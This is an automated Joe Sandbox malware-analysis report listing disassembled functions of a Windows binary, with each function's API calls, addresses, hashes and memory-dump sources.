                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                    • String ID:
                                                                    • API String ID: 429561992-0
                                                                    • Opcode ID: 18a8a4b7a482d2ec60922089ebda865a796e540831b606cdafd978ba0836438a
                                                                    • Instruction ID: eeecf090df5bd493aca17869421e9f1c0981b5a9cb500d2a485eee48661e4e56
                                                                    • Opcode Fuzzy Hash: 18a8a4b7a482d2ec60922089ebda865a796e540831b606cdafd978ba0836438a
                                                                    • Instruction Fuzzy Hash: B2C125B1608305AFD700DF68C88492BBBE9FF89744F14891DF98A9B251D731EE45CB52
                                                                    Function 00957A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 00957AF3
                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00957B8F
                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00957BA3
                                                                    • CoCreateInstance.OLE32(0097FD08,00000000,00000001,009A6E6C,?), ref: 00957BEF
                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00957C74
                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00957CCC
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00957D57
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00957D7A
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00957D81
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00957DD6
                                                                    • CoUninitialize.OLE32 ref: 00957DDC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2762341140-0
                                                                    • Opcode ID: 04faf48eefa473bd7cd53d2b3a345ddced6f7f0f858bfb53426889dbc357f04f
                                                                    • Instruction ID: cdf42c23b0d598ea32007278ce1e18d03305193d9eabe44192bee8f1a3086595
                                                                    • Opcode Fuzzy Hash: 04faf48eefa473bd7cd53d2b3a345ddced6f7f0f858bfb53426889dbc357f04f
                                                                    • Instruction Fuzzy Hash: C5C12B75A04209AFCB14DFA5D884DAEBBF9FF48305B148499E81ADB361D730EE45CB90
                                                                    Function 0097541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00975504
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00975515
                                                                    • CharNextW.USER32(00000158), ref: 00975544
                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00975585
                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0097559B
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009755AC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CharNext
                                                                    • String ID:
                                                                    • API String ID: 1350042424-0
                                                                    • Opcode ID: bd5101f14bdd6c13cb6c5fc6791e76bf527444c2e9272d8cfddc24fc9f9fb612
                                                                    • Instruction ID: db4edbe1d2fdb4753202b19e0dfb16fc417fa7965ea901f555159bdf6ea00e01
                                                                    • Opcode Fuzzy Hash: bd5101f14bdd6c13cb6c5fc6791e76bf527444c2e9272d8cfddc24fc9f9fb612
                                                                    • Instruction Fuzzy Hash: 7F61C072904609EFDF508F50CC84AFE7BB9FF05720F518549F629A62A0D7B49A80DB60
                                                                    Function 0093FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0093FAAF
                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 0093FB08
                                                                    • VariantInit.OLEAUT32(?), ref: 0093FB1A
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0093FB3A
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0093FB8D
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 0093FBA1
                                                                    • VariantClear.OLEAUT32(?), ref: 0093FBB6
                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 0093FBC3
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0093FBCC
                                                                    • VariantClear.OLEAUT32(?), ref: 0093FBDE
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0093FBE9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: 4fc4d15c035b8898abb8bf8fee294320ed71a29ea65dd25dff6742f6c70c0cce
                                                                    • Instruction ID: 167dcb07f6a5b366e233ecfe48edd4c58484b52e796e228bc7ff4a17ac0e3935
                                                                    • Opcode Fuzzy Hash: 4fc4d15c035b8898abb8bf8fee294320ed71a29ea65dd25dff6742f6c70c0cce
                                                                    • Instruction Fuzzy Hash: 04414F75E04219AFCB00DF68D8689AEBBB9FF48344F008069E959E7261DB34A945CF90
                                                                    Function 00949C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00949CA1
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00949D22
                                                                    • GetKeyState.USER32(000000A0), ref: 00949D3D
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00949D57
                                                                    • GetKeyState.USER32(000000A1), ref: 00949D6C
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00949D84
                                                                    • GetKeyState.USER32(00000011), ref: 00949D96
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00949DAE
                                                                    • GetKeyState.USER32(00000012), ref: 00949DC0
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00949DD8
                                                                    • GetKeyState.USER32(0000005B), ref: 00949DEA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: cbf40bca3d369b864f09c2624ee68957303565ef5c6c5f14602760491a607422
                                                                    • Instruction ID: e419e3e6dfeb070023e542e9cef2bb30e508e38da1a8c11a6b9ba71a0db88330
                                                                    • Opcode Fuzzy Hash: cbf40bca3d369b864f09c2624ee68957303565ef5c6c5f14602760491a607422
                                                                    • Instruction Fuzzy Hash: 6641ED749087C96DFF319B60C844BB7BEE86F11344F04805EE6CA576C2D7A599C4C792
                                                                    Function 0096055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 009605BC
                                                                    • inet_addr.WSOCK32(?), ref: 0096061C
                                                                    • gethostbyname.WSOCK32(?), ref: 00960628
                                                                    • IcmpCreateFile.IPHLPAPI ref: 00960636
                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009606C6
                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009606E5
                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 009607B9
                                                                    • WSACleanup.WSOCK32 ref: 009607BF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                    • String ID: Ping
                                                                    • API String ID: 1028309954-2246546115
                                                                    • Opcode ID: 5ebd67d5e334cb6967f17e8c5c84395cfaa85e8ef0ed769f20a8482f35b008c4
                                                                    • Instruction ID: 3cfb6cedb31e3142c09fb169f04dcce0ebbf1a5862989ad2b3ecc8755de1006a
                                                                    • Opcode Fuzzy Hash: 5ebd67d5e334cb6967f17e8c5c84395cfaa85e8ef0ed769f20a8482f35b008c4
                                                                    • Instruction Fuzzy Hash: 0C918C756082419FD320CF19D889F1ABBE4FF84318F1485A9F46A8B6A2C730ED41CF92
                                                                    Function 00968CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharLower
                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                    • API String ID: 707087890-567219261
                                                                    • Opcode ID: d39730fa5acb8b53a39dfc673d539e760bd85f697f1ac1a7c42a5e668142452e
                                                                    • Instruction ID: 46e879857f17c399457b43c38231ea2a83a661c1a97b8a17c3b0dcda21daca62
                                                                    • Opcode Fuzzy Hash: d39730fa5acb8b53a39dfc673d539e760bd85f697f1ac1a7c42a5e668142452e
                                                                    • Instruction Fuzzy Hash: A251BF72A001169BCF24EF6CC9509BFB7A9BF65724B204729E966E72C0DB35DD40C7A0
                                                                    Function 0096372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitialize.OLE32 ref: 00963774
                                                                    • CoUninitialize.OLE32 ref: 0096377F
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,0097FB78,?), ref: 009637D9
                                                                    • IIDFromString.OLE32(?,?), ref: 0096384C
                                                                    • VariantInit.OLEAUT32(?), ref: 009638E4
                                                                    • VariantClear.OLEAUT32(?), ref: 00963936
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 636576611-1287834457
                                                                    • Opcode ID: c1a8356646d906c43fbc11e8a122aa3587163c4d2d32e3473dc7229ed808f4db
                                                                    • Instruction ID: 83d60fbbb1cb757801e59c3a170467d22e4a31e9652a08cf7e08e47b3d4d8b06
                                                                    • Opcode Fuzzy Hash: c1a8356646d906c43fbc11e8a122aa3587163c4d2d32e3473dc7229ed808f4db
                                                                    • Instruction Fuzzy Hash: 17619071608311AFD310DF65C849FAABBE8EF89714F10881DF9859B291D770EE48CB92
                                                                    Function 00953388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 009533CF
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009533F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString$_wcslen
                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 4099089115-3080491070
                                                                    • Opcode ID: 3ae6aa2b1a9cee16300b683a7e8cb53d431a6a39cb8af169fd36d8b48293e3e9
                                                                    • Instruction ID: cd2287326320a41b52aeff50f4a3cd094614ba81fb9e81b70c64779308b5517b
                                                                    • Opcode Fuzzy Hash: 3ae6aa2b1a9cee16300b683a7e8cb53d431a6a39cb8af169fd36d8b48293e3e9
                                                                    • Instruction Fuzzy Hash: D051DF32800249AADF15EBA5CD46EEEB7B8FF45340F244165F509B20A2EB312F58DB61
                                                                    Function 0094B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharUpper
                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                    • API String ID: 1256254125-769500911
                                                                    • Opcode ID: 90643c22bfe11775bb45af2f2c34a4fc87683c4e3bafb0e2f64b286ca0c87c3e
                                                                    • Instruction ID: 06569ac1300098ff4f1c8b0337d24794073b5a2707730e5e3eff7002e96c5a76
                                                                    • Opcode Fuzzy Hash: 90643c22bfe11775bb45af2f2c34a4fc87683c4e3bafb0e2f64b286ca0c87c3e
                                                                    • Instruction Fuzzy Hash: AC41EC32A011279BCB205F7DC8909BE77A9BFA1B74B264529E921DB284E735CD81C790
                                                                    Function 00955393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 009553A0
                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00955416
                                                                    • GetLastError.KERNEL32 ref: 00955420
                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 009554A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                    • API String ID: 4194297153-14809454
                                                                    • Opcode ID: cd10d6c01fd75c0c523ee032216a7551e962e201e109a482687eb14441855181
                                                                    • Instruction ID: 8b8b41149fcb1a22b1ebc98a8acc72f711b7373e802ce52645c2813b9bfaf0fb
                                                                    • Opcode Fuzzy Hash: cd10d6c01fd75c0c523ee032216a7551e962e201e109a482687eb14441855181
                                                                    • Instruction Fuzzy Hash: 4231D675A006049FD710DF6AC894BA97BF8FF45306F198069E805CB2A3D771DD8ACB91
                                                                    Function 00973C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateMenu.USER32 ref: 00973C79
                                                                    • SetMenu.USER32(?,00000000), ref: 00973C88
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00973D10
                                                                    • IsMenu.USER32(?), ref: 00973D24
                                                                    • CreatePopupMenu.USER32 ref: 00973D2E
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00973D5B
                                                                    • DrawMenuBar.USER32 ref: 00973D63
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                    • String ID: 0$F
                                                                    • API String ID: 161812096-3044882817
                                                                    • Opcode ID: a528df7c2b759bf3b666855ab6d8d40a652b581be3822cb771c8b6a19420fb2c
                                                                    • Instruction ID: f78824ba80dc3afde11b800d0535cb077fb062869742d0dafa014b9054a7955b
                                                                    • Opcode Fuzzy Hash: a528df7c2b759bf3b666855ab6d8d40a652b581be3822cb771c8b6a19420fb2c
                                                                    • Instruction Fuzzy Hash: 04417F76615205EFDB24CF54D844ADA77B9FF89350F14802CF94A973A0D771AA10EF90
                                                                    Function 00941EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00941F64
                                                                    • GetDlgCtrlID.USER32 ref: 00941F6F
                                                                    • GetParent.USER32 ref: 00941F8B
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00941F8E
                                                                    • GetDlgCtrlID.USER32(?), ref: 00941F97
                                                                    • GetParent.USER32(?), ref: 00941FAB
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00941FAE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 711023334-1403004172
                                                                    • Opcode ID: 310d6ba5ce60d674b300995eaa0ac2a5191b2124dc4e7d90ebd42582a34eecc5
                                                                    • Instruction ID: 665ea29430687937b38abb1b22c6e562c8d3e7294c4a79900f0b1998ac4215c3
                                                                    • Opcode Fuzzy Hash: 310d6ba5ce60d674b300995eaa0ac2a5191b2124dc4e7d90ebd42582a34eecc5
                                                                    • Instruction Fuzzy Hash: 5021D471A00214BBCF04AFA4CC85EEEBBB8EF06310F104559F9A5A72A1DB755989DB60
                                                                    Function 00973A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00973A9D
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00973AA0
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00973AC7
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00973AEA
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00973B62
                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00973BAC
                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00973BC7
                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00973BE2
                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00973BF6
                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00973C13
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 312131281-0
                                                                    • Opcode ID: 95d1c6d4556be9fe8f437fe3743979895b939ced4d7d5f9c61aad2e3cec51f9b
                                                                    • Instruction ID: da4121b6eb043b2d8913baec635d32ed4a9e6ae32e6895d1b8f29f763565f32b
                                                                    • Opcode Fuzzy Hash: 95d1c6d4556be9fe8f437fe3743979895b939ced4d7d5f9c61aad2e3cec51f9b
                                                                    • Instruction Fuzzy Hash: 32619D72900248AFDB11DFA8CD81EEE77B8EF49710F148159FA19A7291C770AE41EB50
                                                                    Function 0094B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0094B151
                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B165
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0094B16C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B17B
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0094B18D
                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B1A6
